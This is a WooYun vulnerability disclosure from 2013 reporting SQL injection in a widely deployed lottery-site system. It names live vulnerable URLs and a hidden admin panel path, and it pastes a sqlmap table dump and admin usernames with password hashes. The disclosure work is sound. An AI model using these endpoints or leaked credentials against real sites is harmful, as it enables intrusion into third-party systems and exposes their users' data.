漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-046313
漏洞标题:某体彩系统存在SQL注射漏洞(影响多家)
相关厂商:行知网络
漏洞作者: 笨小猪
提交时间:2013-12-18 10:24
修复时间:2014-03-18 10:25
公开时间:2014-03-18 10:25
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-18: 细节已通知厂商并且等待厂商处理中
2013-12-23: 厂商已经确认,细节仅向厂商公开
2013-12-26: 细节向第三方安全合作伙伴开放
2014-02-16: 细节向核心白帽子及相关领域专家公开
2014-02-26: 细节向普通白帽子公开
2014-03-08: 细节向实习白帽子公开
2014-03-18: 细节向公众公开
简要描述:
其实我也不知道他们是正规还是不正规的网站,但是使用的人不少就是了。反正我们主要是讲技术,要是被忽略也没关系。
详细说明:
前台检测倒是没有检查出来问题,问题在于支付过后,将出现SQL注入。
先完善一下资料,然后得到2元。2元就可以买一注,省了我的钱。正因为这两元引发了这次大规模的检测。
我们来到这个页面
http://www.zhongfuti.com/Trade/Dlt/Project_Info.html?id=103233
然后我用sqlmap。
Database: newzhongfuti
[22 tables]
+------------------+
| KR_About |
| KR_Admin |
| KR_Announce |
| KR_Bank_Back |
| KR_Buy |
| KR_Config |
| KR_Follow |
| KR_Link |
| KR_Login |
| KR_Lottery_Code |
| KR_Lottery_Foot |
| KR_Lottery_Info |
| KR_Lottery_Issue |
| KR_Lottery_Win |
| KR_NewsClass |
| KR_NewsClass |
| KR_Notes |
| KR_PayBank |
| KR_PaymentPlat |
| KR_Point |
| KR_User |
| dtproperties |
+------------------+
好的,搞一下密码吧。
| huchaoyang | DD90B9A4DFF00B364C4E25FFC1AF3AA8 |
| xyc | E10ADC3949BA59ABBE56E057F20F883E |
| admin | E244F1E36FDC36803319D329FAADD3B6 |
漏洞证明:
我们登录一下后台,后台你是扫不到的。我是意外得到的
http://www.zhongfuti.com/admin708/index.html
后台可以发现,提供商叫行知网络
同样,发现这样的彩票网站不少,不下百个.关键词不给出了,反正合不合法我不知道啦,正规的有,不正规的也有。例如:
http://bssags.com/ 梵客彩票网
http://www.futizaixian.com 福体在线 后台也是那个。
都是一样的小星星啊。
不敢深入了,你们不要打我啊,给我中一个200块啊,买这么多次了都没有中奖。厂商要是没有给rank的话,wooyun适当看看呗。
PS.厂商真不知道是不是这个,管理顺便帮忙找一下哦。我要上班了哇。
修复方案:
1.过滤
2.修改默认后台路劲
版权声明:转载请注明来源 笨小猪@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:16
确认时间:2013-12-23 08:30
厂商回复:
CNVD确认并复现所述情况,在多个实例确认为通用软件漏洞,由CNVD尝试联系软件开发厂商处置。
最新状态:
暂无